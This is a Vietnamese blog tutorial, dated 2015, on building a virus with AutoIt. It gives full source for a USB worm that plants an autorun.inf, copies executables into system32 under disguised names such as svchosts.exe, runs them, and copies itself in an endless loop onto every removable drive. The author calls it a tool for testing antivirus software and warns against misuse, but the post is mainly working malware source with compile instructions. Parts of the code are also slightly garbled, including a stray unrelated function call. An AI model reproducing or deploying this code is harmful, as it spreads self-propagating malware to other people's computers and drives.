Thứ Tư, 29 tháng 7, 2015

Share it Please
Chắc các bạn không con xa lạ với phần mềm autoit nữa
nên mình hướng dẫn và cho các bạn những code để tạo ra một con virus và mình khuyên các bạn là không dùng những con virus này để đem phá hoại người khác.:angry:
Link Download Autoit : https://www.autoitscript.com/site/autoit/downloads/
Virus này dùng để test phần mềm diệt virus thôi nhé :))
Chuyển đổi file .au3 thành File .exe, bạn click vào thanh start -> AutoIt v3 -> Compile Script to .exe
:angry::angry::angry::angry::angry::angry: Nghiêm cấm đem đi phá hoại nhé :brick::brick::brick:
Phần Code :

#Notrayicon
Dim $autorun = "[autorun]" & @CRLF & "open=svchosts.exe" & @CRLF & "SHELl\opEn\defaUlt=1" & @CRLF & "sHell\eXpLore\CommaND=svchosts.exe"
if not fileexists("C:\Autorun.inf") Then
filewrite("C:\Autorun.inf",$autorun)
endif
fileDelete("C:\Autorun.inf")
filewrite("C:\Autorun.inf",$autorun)
FileCopy(@ScriptDir & "\service.exe","C:\Windows\system32",1)
run("C:\Windows\system32\service.exe")
FileCopy(@ScriptDir & "\svchosts.exe","C:\Windows\system32",1)
while 1
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy("C:\Autorun.inf",$var[0],1)
For $i = 1 to $var[0]
FileCopy("C:\Autorun.inf",$var[$i],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy(@ScriptFullPath,$var[$i],1)
Next
EndIf
wend
loadt2player(402);

End tut


Không có nhận xét nào:

Đăng nhận xét

Blogroll

About